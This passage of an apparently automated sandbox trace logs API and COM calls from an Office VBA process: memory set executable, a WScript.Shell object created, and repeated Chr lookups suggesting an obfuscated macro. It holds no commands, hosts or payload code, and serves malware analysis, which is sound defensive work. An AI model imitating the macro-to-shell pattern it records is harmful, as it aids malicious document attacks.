FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bb64, dwSize=0x54) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813bb64, ImageBase=0x204758, HistoryTable=0x204760 | out: ImageBase=0x204758, HistoryTable=0x204760) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813bb64, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x20485c | out: lpflOldProtect=0x20485c*=0x40) returned 1 [0045.754] RtlAddFunctionTable (FunctionTable=0x813bbc8, EntryCount=0x1, BaseAddress=0x813bb00, TargetGp=0x20485c) returned 1 [0045.754] GetCurrentProcess () returned 0xffffffffffffffff [0045.754] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bc74, dwSize=0x4c) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813bc74, ImageBase=0x204758, HistoryTable=0x204760 | out: ImageBase=0x204758, HistoryTable=0x204760) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813bc74, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x20485c | out: lpflOldProtect=0x20485c*=0x40) returned 1 [0045.754] RtlAddFunctionTable (FunctionTable=0x813bcd0, EntryCount=0x1, BaseAddress=0x813bc00, TargetGp=0x20485c) returned 1 [0045.754] GetCurrentProcess () returned 0xffffffffffffffff [0045.754] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bd2c, dwSize=0x4c) returned 1 [0045.754] RtlLookupFunctionEntry (in: ControlPc=0x813bd2c, ImageBase=0x204758, HistoryTable=0x204760 | out: ImageBase=0x204758, HistoryTable=0x204760) returned 0x0 [0045.754] VirtualProtect (in: lpAddress=0x813bd2c, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x20485c | out: lpflOldProtect=0x20485c*=0x40) returned 1 [0045.755] RtlAddFunctionTable (FunctionTable=0x813bd88, EntryCount=0x1, BaseAddress=0x813bd00, TargetGp=0x20485c) returned 1 [0045.755] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0045.755] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.755] IUnknown:AddRef (This=0x8128768) returned 0x3 [0045.755] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x8128768) returned 0x2 [0045.755] IUnknown:AddRef (This=0x81287c0) returned 0x3 [0045.755] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x81287c0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x81287c0) returned 0x2 [0045.755] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.755] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.755] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.755] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.755] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.755] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.755] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.755] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.755] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.755] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.755] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.755] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.755] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.756] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c28 | out: ppvObject=0x205c28*=0x0) returned 0x80004002 [0045.756] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205c20 | out: ppvObject=0x205c20*=0x0) returned 0x80004002 [0045.756] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x205f80, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x91\x1d\x08", lpUsedDefaultChar=0x0) returned 1 [0045.757] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x205f40 | out: lpclsid=0x205f40*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0045.763] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0045.763] CoCreateInstance (in: rclsid=0x205f40*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee4027890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x205de8 | out: ppv=0x205de8*=0x9805078) returned 0x0 [0046.899] WshShell:IUnknown:QueryInterface (in: This=0x9805078, riid=0x7fee4042600*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x205e00 | out: ppvObject=0x205e00*=0x0) returned 0x80004002 [0046.899] WshShell:IUnknown:QueryInterface (in: This=0x9805078, riid=0x7fee4042610*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x205e08 | out: ppvObject=0x205e08*=0x0) returned 0x80004002 [0046.899] WshShell:IUnknown:QueryInterface (in: This=0x9805078, riid=0x7fee40278b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x205e28 | out: ppvObject=0x205e28*=0x9805050) returned 0x0 [0046.899] WshShell:IUnknown:Release (This=0x9805078) returned 0x1 [0046.957] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0046.957] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813be60 [0046.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x81f732c, cbMultiByte=0, lpWideCharStr=0x3b004ae, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0046.958] ITypeComp:RemoteBind (in: This=0x7edf750, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x2044e8, pDescKind=0x2044fc, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2044e8*=0x0, pDescKind=0x2044fc*=0, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2d92, cbMultiByte=4, lpWideCharStr=0x204530, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0046.958] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x2044e8, pDescKind=0x2044fc, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2044e8*=0x0, pDescKind=0x2044fc*=0, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2d92, cbMultiByte=4, lpWideCharStr=0x204530, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0046.958] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x2044e8, pDescKind=0x2044fc, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2044e8*=0x0, pDescKind=0x2044fc*=0, ppFuncDesc=0x204500, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.958] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0046.958] strcpy_s (in: _Dst=0x204490, _DstSize=0x4, _Src="Chr" | out: _Dst="Chr") returned 0x0 [0046.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204490, cbMultiByte=4, lpWideCharStr=0x2042e0, cchWideChar=4 | out: lpWideCharStr="Chr") returned 4 [0046.958] IUnknown:AddRef (This=0x7edf740) returned 0xc [0046.958] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Chr", lHashVal=0x107e4b, pfName=0x2043b0, pBstrLibName=0x2042e0 | out: pfName=0x2043b0*=1, pBstrLibName=0x2042e0) returned 0x0 [0046.958] IUnknown:Release (This=0x7edf740) returned 0xb [0046.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Chr", cchWideChar=-1, lpMultiByteStr=0x204490, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chr", lpUsedDefaultChar=0x0) returned 4 [0046.958] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0046.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2d92, cbMultiByte=4, lpWideCharStr=0x204530, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0046.958] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x2044e8, pDescKind=0x2044fc, ppFuncDesc=0x204500, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2044e8*=0x0, pDescKind=0x2044fc*=0, ppFuncDesc=0x204500, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.959] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bfb0 [0046.959] _mbscpy_s (in: _Dst=0x817bfb0, _DstSizeInBytes=0x4, _Src=0x30d2d92 | out: _Dst=0x817bfb0) returned 0x0 [0046.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0046.959] strcpy_s (in: _Dst=0x204640, _DstSize=0xb, _Src="_B_var_Chr" | out: _Dst="_B_var_Chr") returned 0x0 [0046.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204640, cbMultiByte=11, lpWideCharStr=0x204490, cchWideChar=11 | out: lpWideCharStr="_B_var_Chr") returned 11 [0046.959] IUnknown:AddRef (This=0x7edf740) returned 0xc [0046.959] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_Chr", lHashVal=0x103b5c, pfName=0x204560, pBstrLibName=0x204490 | out: pfName=0x204560*=1, pBstrLibName=0x204490) returned 0x0 [0046.959] IUnknown:Release (This=0x7edf740) returned 0xb [0046.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Chr", cchWideChar=-1, lpMultiByteStr=0x204640, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Chr", lpUsedDefaultChar=0x0) returned 11 [0046.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0046.959] IUnknown:AddRef (This=0x7edf740) returned 0xc [0046.959] IUnknown:Release (This=0x7edf740) returned 0xb [0046.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0532, cbMultiByte=11, lpWideCharStr=0x2044f0, cchWideChar=12 | out: lpWideCharStr="_B_var_Chr") returned 11 [0046.959] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_Chr", lHashVal=0x103b5c, wFlags=0x3, ppTInfo=0x2044a8, pDescKind=0x2044bc, ppFuncDesc=0x2044c0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2044a8*=0x8128768, pDescKind=0x2044bc*=1, ppFuncDesc=0x2044c0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0046.959] ITypeInfo:RemoteGetTypeAttr (in: This=0x8128768, ppTypeAttr=0x2044b0, pDummy=0x1 | out: ppTypeAttr=0x2044b0, pDummy=0x1) returned 0x0 [0046.959] ITypeInfo:LocalReleaseTypeAttr (This=0x8128768) returned 0x0 [0046.959] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x204310 | out: ppvObject=0x204310*=0x8128768) returned 0x0 [0046.959] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x8128768, memid=1610612738, invkind=1, pFuncIndex=0x204350 | out: pFuncIndex=0x204350*=0x2) returned 0x0 [0046.959] ITypeInfo2:GetFuncCustData (in: This=0x8128768, index=0x2, GUID=0x7fee4043758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x204368 | out: pVarVal=0x204368*(varType=0x0, wReserved1=0x20, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x103b5c)) returned 0x0 [0046.959] IUnknown:Release (This=0x8128768) returned 0x3 [0046.959] IUnknown:AddRef (This=0x8128768) returned 0x4 [0046.959] ITypeInfo:LocalReleaseFuncDesc (This=0x8128768) returned 0x0 [0046.959] IUnknown:Release (This=0x8128768) returned 0x3 [0046.959] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204568 | out: ppvObject=0x204568*=0x0) returned 0x80004002 [0046.959] IUnknown:AddRef (This=0x8128768) returned 0x4 [0046.960] IUnknown:Release (This=0x8128768) returned 0x3 [0046.960] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204788 | out: ppvObject=0x204788*=0x0) returned 0x80004002 [0046.960] IUnknown:QueryInterface (in: This=0x8128768, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204780 | out: ppvObject=0x204780*=0x0) returned 0x80004002 [0046.960] IMalloc:Free (This=0x7feff045380, pv=0x817bfb0) [0046.960] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x203fc0, pIndex=0x0 | out: ppTLib=0x203fc0*=0x7edf740, pIndex=0x0) returned 0x0 [0046.960] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x203fd0, pDummy=0x0 | out: ppTLibAttr=0x203fd0, pDummy=0x0) returned 0x0 [0046.960] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.960] IUnknown:Release (This=0x7edf740) returned 0xc [0046.960] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x203fc0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.960] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x203fc0, pbstrName=0x0, pwOrdinal=0x203fe0 | out: pBstrDllName=0x203fc0*=0x0, pbstrName=0x0, pwOrdinal=0x203fe0*=0x4250) returned 0x0 [0046.960] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x203fc0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x203fc0, pwOrdinal=0x500000000) returned 0x0 [0046.960] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0046.960] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.960] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0046.960] GetCurrentProcess () returned 0xffffffffffffffff [0046.960] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x43) returned 1 [0046.960] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0046.960] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x204100, pIndex=0x0 | out: ppTLib=0x204100*=0x7edf740, pIndex=0x0) returned 0x0 [0046.960] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204110, pDummy=0x0 | out: ppTLibAttr=0x204110, pDummy=0x0) returned 0x0 [0046.961] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0046.961] IUnknown:Release (This=0x7edf740) returned 0xc [0046.961] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x204100, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0046.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0046.961] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x204100, pbstrName=0x0, pwOrdinal=0x204120 | out: pBstrDllName=0x204100*=0x0, pbstrName=0x0, pwOrdinal=0x204120*=0x4390) returned 0x0 [0046.961] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204100, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204100, pwOrdinal=0x500000000) returned 0x0 [0046.961] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba54f0, cb=0x168) returned 0x8096ef0 [0046.961] IMalloc:Free (This=0x7feff045380, pv=0x7f18790) [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0046.961] GetCurrentProcess () returned 0xffffffffffffffff [0046.961] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0046.961] SetErrorMode (uMode=0x8001) returned 0x8001 [0046.962] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0046.962] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0046.962] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c49000001bf) returned 1 [0046.962] SetErrorMode (uMode=0x8001) returned 0x8001 [0046.963] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x260) returned 0x7fee3dfae28 [0046.963] GetCurrentProcess () returned 0xffffffffffffffff [0046.963] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bf7c, dwSize=0x43) returned 1 [0046.963] RtlLookupFunctionEntry (in: ControlPc=0x813bf7c, ImageBase=0x204598, HistoryTable=0x2045a0 | out: ImageBase=0x204598, HistoryTable=0x2045a0) returned 0x0 [0046.963] VirtualProtect (in: lpAddress=0x813bf7c, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x20469c | out: lpflOldProtect=0x20469c*=0x40) returned 1 [0046.963] RtlAddFunctionTable (FunctionTable=0x813bfcc, EntryCount=0x1, BaseAddress=0x813bf00, TargetGp=0x20469c) returned 1 [0046.963] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0046.963] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, 